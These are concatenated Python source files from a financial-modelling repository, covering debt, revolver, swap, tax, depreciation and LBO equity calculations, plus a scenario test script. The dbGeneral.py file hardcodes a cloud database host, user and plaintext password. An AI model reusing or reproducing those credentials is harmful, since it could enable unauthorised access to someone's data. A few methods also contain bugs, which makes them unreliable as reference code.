upsizes_df['date'] = upsizes_df.apply(lambda row: date(row['date'].year, row['date'].month, monthrange(row['date'].year, row['date'].month)[1]), axis=1)
self.upsizes = upsizes_df.set_index('date')['value'].to_dict()
else:
self.upsizes = {}
""" load debt prepayment information """
prepay_df = debt_activity_df.loc[debt_activity_df.activity_type=='prepayment'][['date','value']].copy()
if len(prepay_df) > 0:
prepay_df['date'] = prepay_df.apply(lambda row: date(row['date'].year, row['date'].month, monthrange(row['date'].year, row['date'].month)[1]), axis=1)
prepay_df['value'] = prepay_df['value']
self.prepays = prepay_df.set_index('date')['value'].to_dict()
else:
self.prepays = {}
return self.upsizes, self.prepays, debt_activity_df
def set_historical_interest_payments(self, forecast_start_month, debt_activity_df=None):
if self.flagHistoricals:
if debt_activity_df is None:
debt_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
interest_expense_df = debt_activity_df.loc[(debt_activity_df.instrument_id == self.instrumentID) & (debt_activity_df.activity_type == 'interest expense') & (debt_activity_df.date < forecast_start_month)].copy()
interest_expense_df['value'] = - interest_expense_df['value']
self.interestPayments = interest_expense_df.set_index('date')['value'].to_dict()
return self.interestPayments
def build_amortizations(self, forecast_start_month):
period_list = self.build_period_list()
for period_month in period_list:
if period_month[0] >= forecast_start_month:
if period_month[0].month % self.periodicityMonths == 0:
self.amortizations[period_month[0]] = self.initialBalance * self.annualScheduledAmort / 12.0 * self.periodicityMonths
return self.amortizations
class FixedDebt(Debt):
def __init__(self,
fixed_rate,
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count='30/360',
sweep_percent=1,
dsra_months=6,
oids=[], # a list of OID objects
dfcs=[], # a list of DFC objects
oid_payments={},
dfc_payments={},
upsizes={},
prepays={},
effective_interest_rates={},
interest_payments={},
required_dsras={},
dsra_cash_movement={},
amortizations={},
principal_balances={},
flag_prepayable=True,
flag_historicals=True,
flag_dsra_fund_by_lc=True):
Debt.__init__(self,
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count,
sweep_percent,
dsra_months,
oids,
dfcs,
oid_payments,
dfc_payments,
upsizes,
prepays,
effective_interest_rates,
interest_payments,
required_dsras,
dsra_cash_movement,
amortizations,
principal_balances,
flag_prepayable,
flag_historicals,
flag_dsra_fund_by_lc)
self.fixedRate = fixed_rate
def set_effective_interest_rates(self):
period_list = Debt.build_period_list(self)
for month in period_list:
month_end = month[0]
self.effectiveInterestRates[month_end] = self.fixedRate
return self.effectiveInterestRates
# TLB TLC
class FloatingDebt(Debt):
def __init__(self,
margins, # only floating debt has margin
index, # only floating debt has index
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count='30/360',
sweep_percent=1,
dsra_months=6,
oids=[], # a list of OID objects
dfcs=[], # a list of DFC objects
oid_payments={},
dfc_payments={},
upsizes={},
prepays={},
effective_interest_rates={},
interest_payments={},
required_dsras={},
dsra_cash_movement={},
amortizations={},
principal_balances={},
flag_prepayable=True,
flag_historicals=True):
Debt.__init__(self,
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count,
sweep_percent,
dsra_months,
oids,
dfcs,
oid_payments,
dfc_payments,
upsizes,
prepays,
effective_interest_rates,
interest_payments,
required_dsras,
dsra_cash_movement,
amortizations,
principal_balances,
flag_prepayable,
flag_historicals)
self.index = index
self.margins = margins
def set_effective_interest_rates(self, index_df, forecast_start, floor=None):
# to be implemented
index_df = index_df.loc[index_df.instrument_id==self.index]
index_df['adjusted_period'] = index_df.apply(lambda row: dateUtils.get_one_month_later(row['period']), axis=1)
period_list = Debt.build_period_list(self)
period_list = [period for period in period_list if period[0] >= forecast_start]
for period_month in period_list:
month_end = period_month[0]
floating_interest_rate = index_df.loc[index_df.adjusted_period==month_end].iloc[0]['value']
margin = sum([float(margin_item[0]) for margin_item in self.margins if margin_item[1] <= month_end and month_end <= margin_item[2]])
if floor is not None:
floating_interest_rate = 0.01 if floating_interest_rate < 0.01 else floating_interest_rate
self.effectiveInterestRates[month_end] = floating_interest_rate + margin
# Revolver
class Revolver(FloatingDebt):
def __init__(self,
credit_line, # only revolver has credit line, the maximum capacity
min_cash_reserve_revolver, # still thinking if we need this: condition for the revolver draw if cash is below a certain amount
# new logic is going to assume fully draw revolver
# then get the total liquidity = revolver + ending cash
# repay revolver as much as possible to its credit line
# repay revolver as much as possible to minimum_cash_reserve_revolver if cannot repay back to
# for lightstone, it is if balance below 0 for a month, repay amount only to get the
# revolver draw should happen during month while repay should only happen during quarter ends
margins, # only floating debt has margin
index, # only floating debt has index
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date, # will be none since revolver doesnt do amortization
periodicity_months, # will be 1 month
annual_scheduled_amort, # will be 0 since revolver doesnt do amortization
min_cash_reserve_prepay,
day_count='30/360',
sweep_percent=1, # will not be used by revolver
dsra_months=6, # will not be used by revolver
oids=[], # empty for revolver
dfcs=[], # empty for revolver
oid_payments={}, # empty for revolver
dfc_payments={}, # empty for revolver
upsizes={}, # this will be used as the revolver draw
prepays={}, # this will be used as the revolver payback
effective_interest_rates={}, # the effective interest rates
interest_payments={}, # the interest payments
required_dsras={}, # empty for revolver
dsra_cash_movement={}, # empty for revolver
amortizations={},
principal_balances={},
flag_prepayable=True, # prepay for revolver is acting as repay any remaining balance of the revolver
flag_historicals=True): # flag for reading historicials for the revolver, always true for revolver to get the life to date balance
FloatingDebt.__init__(self,
margins, # only floating debt has margin
index, # only floating debt has index
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count,
sweep_percent,
dsra_months,
oids,
dfcs,
oid_payments,
dfc_payments,
upsizes,
prepays,
effective_interest_rates,
interest_payments,
required_dsras,
dsra_cash_movement,
amortizations,
principal_balances,
flag_prepayable,
flag_historicals)
self.creditLine = credit_line
self.minCashReserveRevolver = min_cash_reserve_revolver
def build_revolver_draw(self, ending_cash_balances):
for period in ending_cash_balances:
ending_cash_balance = ending_cash_balances[period]
# only if a period
# 1. has negative cash flow
# 2. is not a quarter end
# 3. does not have predefined draw amount
if ending_cash_balance < 0 and period.month % self.periodicityMonths != 0 and self.upsizes[period] != 0:
self.upsizes[period] = self.min_cash_reserve_revolver - ending_cash_balance
return self.upsizes
def set_historical_revolver_change(self, forecast_start_month):
if self.flagHistoricals is True:
revolver_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
upsizes_df = revolver_activity_df.loc[(revolver_activity_df.activity_type=='draw') & (revolver_activity_df.date < forecast_start_month)][['date','value']]
prepays_df = revolver_activity_df.loc[(revolver_activity_df.activity_type=='repay') & (revolver_activity_df.date < forecast_start_month)][['date','value']]
upsizes_df['date'] = upsizes_df.apply(lambda row: date(row['date'].year, row['date'].month, monthrange(row['date'].year, row['date'].month)[1]), axis=1)
prepays_df['date'] = prepays_df.apply(lambda row: date(row['date'].year, row['date'].month, monthrange(row['date'].year, row['date'].month)[1]), axis=1)
self.upsizes = upsizes_df.set_index('date')['value'].to_dict()
self.prepays = prepays_df.set_index('date')['value'].to_dict()
return self.upsizes, self.prepays
def set_projected_revolver_change(self, forecast_start_month, scenario_assumptions_df):
scenario_assumptions_df['value'] = pd.to_numeric(scenario_assumptions_df['value'], downcast='float')
upsizes_df = scenario_assumptions_df.loc[(scenario_assumptions_df.account=='Revolver Change') & (scenario_assumptions_df.value > 0) & (scenario_assumptions_df.date_end >= forecast_start_month)][['date_end','value']]
prepays_df = scenario_assumptions_df.loc[(scenario_assumptions_df.account=='Revolver Change') & (scenario_assumptions_df.value <= 0) & (scenario_assumptions_df.date_end >= forecast_start_month)][['date_end','value']]
prepays_df['value'] = - prepays_df['value']
upsizes_df['date'] = upsizes_df.apply(lambda row: date(row['date_end'].year, row['date_end'].month, monthrange(row['date_end'].year, row['date_end'].month)[1]), axis=1)
prepays_df['date'] = prepays_df.apply(lambda row: date(row['date_end'].year, row['date_end'].month, monthrange(row['date_end'].year, row['date_end'].month)[1]), axis=1)
projected_upsizes_dict = upsizes_df.set_index('date')['value'].to_dict()
for month in projected_upsizes_dict:
if month in self.upsizes:
self.upsizes[month] = self.upsizes[month] + projected_upsizes_dict[month]
else:
self.upsizes[month] = projected_upsizes_dict[month]
projected_prepays_dict = prepays_df.set_index('date')['value'].to_dict()
for month in projected_prepays_dict:
if month in self.prepays:
self.prepays[month] = self.prepays[month] - projected_prepays_dict[month]
else:
self.prepays[month] = projected_prepays_dict[month]
return self.upsizes, self.prepays
class OID:
def __init__(self, balance, begin_date, end_date, oid_discount):
self.balance = balance
self.beginDate = begin_date
self.endDate = end_date
self.oidDiscount = oid_discount
# private function for calculating monthly accretions
def __balance_accretion(balance, oid_discount, oid_ytm, begin_date, end_date):
start_discounted_balance = balance * oid_discount / 100.0
# if begin_date is already a month end, then start from the next month
month_end = date(begin_date.year, begin_date.month, monthrange(begin_date.year, begin_date.month)[-1])
month_begin_balance = start_discounted_balance
monthly_oid_payments = {}
while month_end < end_date:
month_begin_balance += (1/12.0) * oid_ytm * month_begin_balance
monthly_oid_payments[month_end] = (1/12.0) * oid_ytm * month_begin_balance
month_end = month_end + timedelta(days=1)
month_end = date(month_end.year, month_end.month, monthrange(month_end.year, month_end.month)[-1])
if month_end >= end_date and month_end.year == end_date.year and month_end.month == end_date.month:
month_begin_balance += (1/12.0) * oid_ytm * month_begin_balance
monthly_oid_payments[month_end] = (1/12.0) * oid_ytm * month_begin_balance
return month_begin_balance, monthly_oid_payments
# private function for calculating oid accretions
def __oid_ytm_calc_wrapper(oid_ytm, *args):
balance, begin_date, end_date, oid_discount = args
accretioned_balance, monthly_oid_payments = OID.__balance_accretion(balance, oid_discount, oid_ytm[0], begin_date, end_date)
return balance - accretioned_balance
def build_monthly_oid_payments(self):
oid_ytm = 0.001
oid_ytm = fsolve(OID.__oid_ytm_calc_wrapper, oid_ytm, args=(self.balance, self.beginDate, self.endDate, self.oidDiscount))
reached_balance, monthly_oid_payments = OID.__balance_accretion(self.balance, self.oidDiscount, oid_ytm[0], self.beginDate, self.endDate)
return monthly_oid_payments
@staticmethod
def calc_monthly_oid_payments(balance, begin_date, end_date, oid_discount):
oid_ytm = 0.001
oid_ytm = fsolve(OID.__oid_ytm_calc_wrapper, oid_ytm, args=(balance, begin_date, end_date, oid_discount))
reached_balance, monthly_oid_payments = OID.__balance_accretion(balance, oid_discount, oid_ytm[0], begin_date, end_date)
return monthly_oid_payments
class DFC:
def __init__(self, debt_balance, begin_date, end_date, dfc_rate):
self.debtBalance = debt_balance
self.beginDate = begin_date
self.endDate = end_date
self.dfcRate = dfc_rate
def build_monthly_dfc_payments(self):
month_end = date(self.beginDate.year, self.beginDate.month, monthrange(self.beginDate.year, self.beginDate.month)[-1])
monthly_dfc_payments = {}
month_end = date(self.beginDate.year, self.beginDate.month, monthrange(self.beginDate.year, self.beginDate.month)[-1])
while month_end < self.endDate:
number_of_days_for_period = month_end.day
if month_end.year == self.beginDate.year and month_end.month == self.beginDate.month:
number_of_days_for_period = (month_end.day - self.beginDate.day) + 1
number_of_days_for_year = (date(month_end.year, 12, 31) - date(month_end.year, 1, 1)).days + 1
monthly_dfc_payments[month_end] = (number_of_days_for_period / number_of_days_for_year) * self.dfcRate * self.debtBalance
month_end = month_end + timedelta(days=1)
month_end = date(month_end.year, month_end.month, monthrange(month_end.year, month_end.month)[-1])
if month_end >= self.endDate and month_end.year == self.endDate.year and month_end.month == self.endDate.month:
number_of_days_for_period = self.endDate.day
number_of_days_for_year = (date(self.endDate.year, 12, 31) - date(self.endDate.year, 1, 1)).days
monthly_dfc_payments[month_end] = (number_of_days_for_period / number_of_days_for_year) * self.dfcRate * self.debtBalance
return monthly_dfc_payments
class Swap:
def __init__(self, portfolio, instrument_id, index, trade_date, counterparty, swap_rates):
self.portfolio = portfolio
self.instrumentID = instrument_id
self.index = index
self.tradeDate = trade_date
self.counterparty = counterparty
self.swapRates = swap_rates
""" date_fix_rate, date_start, date_end, notional, fix_rate, floating_rate, number_of_days, swap_per_day """
def build_swap_interest_payments(self, index_df):
for swap_info in self.swapRates:
date_fix_rate = swap_info[0]
date_start = swap_info[1]
date_end = swap_info[2]
notional = swap_info[3]
fix_rate = swap_info[4]
floating_rate = 0.0
index_df['adjusted_period'] = index_df.apply(lambda row: date(row['period'].year, row['period'].month, monthrange(row['period'].year, row['period'].month)[1]), axis=1)
""" since fix_rate_date is always the prior month rate, there is no need to shift the libor again """
# index_df['rate_use_date'] = index_df.apply(lambda row: dateUtils.get_one_month_later(row['adjusted_period']), axis=1)
date_fix_rate = date(date_fix_rate.year, date_fix_rate.month, monthrange(date_fix_rate.year, date_fix_rate.month)[1])
floating_rate = index_df.loc[(index_df.adjusted_period==date_fix_rate) & (index_df.instrument_id==self.index)]['value'].mean()
""" for swap, floating side libor has a 1 percent floor """
floating_rate = 0.01 if floating_rate < 0.01 else floating_rate
number_of_days = (date_end - date_start).days
swap_payment_perday = 1 / 365 * (fix_rate - floating_rate) * notional
swap_info.append(floating_rate)
swap_info.append(number_of_days)
swap_info.append(swap_payment_perday)
return self.swapRates
def get_swap_rates_from_db(self):
swap_rates_df = dbLiquidity.get_swap(self.portfolio, self.instrumentID)
self.swapRates = swap_rates_df[['date_fix_rate', 'date_start', 'date_end', 'notional', 'fix_rate']].values.tolist()
def build_swap_payments_by_month(self, start_month, end_month):
index_month = start_month
swap_payments_monthly_result_list = []
while index_month <= end_month:
index_month_start_date = date(index_month.year, index_month.month, 1)
index_month_end_date = date(index_month.year, index_month.month, monthrange(index_month.year, index_month.month)[1])
index_day = index_month_start_date
total_days = 0.0
total_balance = 0.0
total_interest_payment = 0.0
average_daily_notional = 0.0
effective_interest_rate = 0.0
while index_day <= index_month_end_date:
for swap_rate_info in self.swapRates:
if swap_rate_info[1] <= index_day and swap_rate_info[2] >= index_day:
total_balance += swap_rate_info[3]
total_interest_payment += swap_rate_info[7]
total_days += 1
break
index_day = index_day + timedelta(1)
if total_days != 0:
average_daily_notional = total_balance / total_days
effective_interest_rate = total_interest_payment / total_days * 365 / average_daily_notional
swap_payments_monthly_result_list.append([index_month_start_date, index_month_end_date, total_days, average_daily_notional, effective_interest_rate, total_interest_payment])
index_month = index_month + timedelta(1)
index_month = date(index_month.year, index_month.month, monthrange(index_month.year, index_month.month)[1])
swap_payments_monthly_result_df = pd.DataFrame(data=swap_payments_monthly_result_list, columns=['month_start','month_end','number_of_days','average_daily_notional','effective_interest_rate','total_interest_payment'])
swap_payments_monthly_result_df['instrument_id'] = self.instrumentID
return swap_payments_monthly_result_df
class LettersOfCredit():
pass
class TaxRegister():
def __init__(self, portfolio, effective_tax_rate=0.0, tax_split_ratio=[], paid_tax={}):
self.portfolio = portfolio
self.effectiveTaxRate = effective_tax_rate
self.taxSplitRatio = tax_split_ratio
self.paidTax = paid_tax
def get_paid_tax_from_db(self, as_of_date):
paid_tax_dict = dbLiquidity.get_paid_tax(self.portfolio, as_of_date)
self.paidTax = paid_tax_dict
def calculate_tax_payment(self, year, total_oid, total_ebitda, total_dfc, total_tax_depreciation, total_interest_expense = None):
""" differs by portfolio """
if self.portfolio == 'Lightstone':
adj_interest_deduction_cap = 0.0
if year <= 2021:
adj_interest_deduction_cap = total_ebitda * 0.3
if total_interest_expense is not None:
adj_interest_deduction_cap = min([total_ebitda * 0.3, total_interest_expense + total_oid])
else:
adj_interest_deduction_cap = (total_ebitda - total_tax_depreciation) * 0.3
if total_interest_expense is not None:
adj_interest_deduction_cap = min([(total_ebitda - total_tax_depreciation) * 0.3, total_interest_expense + total_oid])
ebt = total_ebitda - adj_interest_deduction_cap - total_dfc - total_tax_depreciation
total_tax = ebt * self.effectiveTaxRate
paid_ptd_list = []
for key in sorted(self.paidTax.keys()):
if key.year == year:
paid_ptd_list.append(self.paidTax[key])
if len(paid_ptd_list) == 0:
return [total_tax * item for item in self.taxSplitRatio]
else:
return paid_ptd_list + [(total_tax - sum(paid_ptd_list)) / (4 - len(paid_ptd_list)) for i in range(4 - len(paid_ptd_list))]
class FixedAsset():
def __init__(self, portfolio, entity_name, depreciation_method, depreciation_term, in_service_year, initial_purchase_price, capex={}, depreciation_adjustment={}):
self.portfolio = portfolio
self.entityName = entity_name
self.depreciationMethod = depreciation_method
self.depreciationTerm = depreciation_term
self.inServiceYear = in_service_year
self.initialPurchasePrice = initial_purchase_price
self.capex = capex
self.depreciationAdjustment = depreciation_adjustment
def calcualte_tax_depreciation(self, additional_capex, year):
if self.depreciationTerm == 0:
""" e.g. land """
return 0
total_tax_depreciation = 0
if self.inServiceYear == year and self.depreciationMethod == 'Straight Line':
total_tax_depreciation += self.initialPurchasePrice * 1/self.depreciationTerm / 2
if self.inServiceYear < year and self.depreciationMethod == 'Straight Line':
total_tax_depreciation += self.initialPurchasePrice * 1/self.depreciationTerm
total_previous_year_capex = sum([self.capex[capex_year] for capex_year in self.capex if capex_year < year])
total_previous_year_dep_adjustment = sum([self.depreciationAdjustment[adj_year] for adj_year in self.depreciationAdjustment if adj_year + 1 == year])
total_tax_depreciation += total_previous_year_capex * 1 / self.depreciationTerm
total_tax_depreciation += total_previous_year_dep_adjustment * 1 / self.depreciationTerm
for capex_year in additional_capex:
if capex_year < year:
total_tax_depreciation += additional_capex[capex_year] * 1/self.depreciationTerm
if year in additional_capex:
total_tax_depreciation += additional_capex[year] * 1/self.depreciationTerm/2
return total_tax_depreciation
class Equity():
def __init__(self, name, purchase_price, debt_percentage, exit_multiple, irr_frequency, exit_time, periodicity_months, exit_value=0.0):
self.name = name
self.purchasePrice = purchase_price
self.debtPercentage = debt_percentage
self.exitMultiple = exit_multiple
self.irrFrequency = irr_frequency
self.exitTime = exit_time
self.periodicityMonths = periodicity_months
self.exitValue = exit_value
def calculate_initial_equity(self):
return self.purchasePrice - self.purchasePrice * self.debtPercentage
def calculate_dollar_per_capacity(self, total_capacity, unit='$/Kw'):
return self.purchasePrice / total_capacity
def calculate_exit_value(self, last_tweleve_months_ebitda):
return self.exitMultiple * last_tweleve_months_ebitda
def calculate_equity_sweep(self, forecast_month, available_cash):
if forecast_month.month % self.periodicityMonths != 0:
return 0
if available_cash > 0:
return available_cash
return 0
def calculate_irr_and_moic(self, equity_cashflow, exit_value_less_debt):
if self.irrFrequency.lower() == 'annual':
initial_equity = self.purchasePrice * (1 - self.debtPercentage)
start_year = equity_cashflow.index.min().year
end_year = equity_cashflow.index.max().year
year_list = list(range(start_year, end_year+1))
equity_annual_cashflow_list = []
for year in year_list:
if year == year_list[-1]:
cashflow_for_the_year = exit_value_less_debt - equity_cashflow.loc[date(year,1,31):date(year,12,31)]['Equity - sweep'].sum()
else:
cashflow_for_the_year = -equity_cashflow.loc[date(year,1,31):date(year,12,31)]['Equity - sweep'].sum()
equity_annual_cashflow_list.append(cashflow_for_the_year)
equity_annual_cashflow_list = [-initial_equity] + equity_annual_cashflow_list
return equity_annual_cashflow_list, np.irr(equity_annual_cashflow_list), sum(equity_annual_cashflow_list) / initial_equity
else:
return 0.0,0.0
def calculate_equity_exit(index, last_tweleve_months_ebitda):
if index != self.exitTime:
return 0
return last_tweleve_months_ebitda * self.exitMultiple
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,745 | changliukean/KEAN3 | refs/heads/master | /database/dbGeneral.py | import mysql.connector
HOST='kindledb.cfdmlfy5ocmf.us-west-2.rds.amazonaws.com'
USER='Andrew'
PASSWORD='Kindle01'
DATABASE='kean3'
PROD_DATABASE = 'kean'
def config_connection(host, user, password, database):
conn_ins = mysql.connector.connect(host=host, user=user, password=password, database=database)
return conn_ins
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,746 | changliukean/KEAN3 | refs/heads/master | /scenario_master_testcase.py | from scenario_control.Scenario import Scenario, ScenarioMaster
from datetime import datetime, date
from financial.FSLI import FSLI
if __name__ == "__main__":
print ("here we start our testing script")
print ("---------------------------------------------")
# Test case 1, load a financials scenario from database
print ("Test case 1, load a financials scenario from database")
module = 'financials'
table = 'financials_dev'
portfolio = 'Lightstone'
scenario = '2019 Dec AMR'
version = 'v2'
myFinancialsScenario = Scenario(module, table, portfolio, scenario, version)
myFinancialsScenario.print_scenario()
print ("------------------------------------------------")
myFinancialsScenarioMaster = ScenarioMaster(myFinancialsScenario)
myFinancialsScenarioMaster.load_sm_fromdb()
print (myFinancialsScenarioMaster)
# Test case 2, initiate a financials scenario to database
print ("================================================")
print ("================================================")
print ("Test case 2, initiate a financials scenario to database")
new_module, new_table, new_portfolio, new_scenario, new_version = 'financials', 'financials_dev', 'Lightstone', '2019 Dec AMR OOB Test', 'v1'
new_dispatch_module, new_dispatch_table, new_dispatch_portfolio, new_dispatch_scenario, new_dispatch_version = 'dispatch', 'dispatch', 'Lightstone', '2019 Dec AMR OOB Dispatch Test', 'v1'
# we will get pure data matrix from KAT
portfolio = 'Lightstone'
# step 1. define the output scenario
output_financials_scenario = Scenario('financials','financials_dev', portfolio, '2020 OOB Test Financials','v1','comments')
# step 2. define the dispatch input scenario master
output_dispatch_scenario = Scenario('dispatch','dispatch', portfolio, '2020 OOB Test Dispatch','v1','comments')
output_dispatch_start_year = 2020
output_dispatch_number_of_years = 6
output_dispatch_forecast_start_month = date(2020, 2, 29)
output_dispatch_valuation_date = date(2020, 1, 29)
dispatch_input_list = [['curve','prices', portfolio, '2020 OOB Test Curve','v1','comments'],
['curve_basis','prices', portfolio, '2020 OOB Test Basis','v1','comments'],
['hourly_shaper','prices', portfolio, '2020 OOB Test Hourly Shaper','v1','comments'],
['plant_characteristics', portfolio, 'plant_characteristics','2020 OOB Test PCUC','v1','comments']]
dispatch_input_scenarios = []
for dispatch_input_data in dispatch_input_list:
dispatch_input_scenario = Scenario(dispatch_input_data[0], dispatch_input_data[1], dispatch_input_data[2], dispatch_input_data[3], dispatch_input_data[4], dispatch_input_data[5])
dispatch_input_scenarios.append(dispatch_input_scenario)
dispatch_scenario_master = ScenarioMaster(output_dispatch_scenario,
output_dispatch_start_year,
output_dispatch_number_of_years,
output_dispatch_forecast_start_month,
output_dispatch_valuation_date,
inputScenarios=dispatch_input_scenarios)
# step 3. define other input scenarios
input_scenario_list = [['actuals_accrual', 'gl_activities', portfolio, '2020 OOB all transactions', 'v1', 'comment'],
['actuals_cash', 'gl_activities', portfolio, '2020 OOB all invoices paidinfull', 'v1', 'comment'],
['project_reforecast', 'projects', portfolio, '2020 OOB project reforecast', 'v1', 'comment'],
['census', 'census', portfolio, '2020 OOB census', 'v1', 'comment'],
['labor_assumptions', 'assumptions', portfolio, '2020 OOB labor assumptions', 'v1', 'comment'],
['fsli_directload', 'assumptions', portfolio, '2020 OOB direct load fsli', 'v1', 'comment'],
['prior_forecast', 'financials_dev', portfolio, '2020 OOB prior forecast', 'v1', 'comment'],
['budget', 'financials_dev', portfolio, '2020 OOB budget', 'v1', 'comment']]
financials_input_scenarios = []
for input_scenario in input_scenario_list:
input_scenario = Scenario(input_scenario[0], input_scenario[1], input_scenario[2], input_scenario[3], input_scenario[4], input_scenario[5])
financials_input_scenarios.append(input_scenario)
# step 4. define financials scenario master
# by default, financials have the same datetime information with dispatch
financials_start_year = 2020
financials_number_of_years = 6
financials_forecast_start_month = date(2020, 2, 29)
financials_valuation_date = date(2020, 1, 29)
dispatch_scenario_master = ScenarioMaster(output_financials_scenario,
financials_start_year,
financials_number_of_years,
financials_forecast_start_month,
financials_valuation_date,
inputScenarios=financials_input_scenarios,
inputScenarioMasters=[dispatch_scenario_master])
# print (dispatch_scenario_master)
dispatch_scenario_master.save()
# Test case 3, load an inserted financials scenario from database
module = 'financials'
table = 'financials_dev'
portfolio = 'Lightstone'
scenario = '2020 OOB Test Financials'
version = 'v1'
myFinancialsScenario = Scenario(module, table, portfolio, scenario, version)
myFinancialsScenario.print_scenario()
print ("------------------------------------------------")
myFinancialsScenarioMaster = ScenarioMaster(myFinancialsScenario)
myFinancialsScenarioMaster.load_sm_fromdb()
print (myFinancialsScenarioMaster)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,747 | changliukean/KEAN3 | refs/heads/master | /database/dbLBO.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,DATABASE, PROD_DATABASE, config_connection
from sqlalchemy import create_engine
import pandas as pd
from datetime import datetime, date
def put_financials_lbo(ready_to_kean_lbo_financials_df, portfolio, scenario, version, overwrite_option=False):
if overwrite_option:
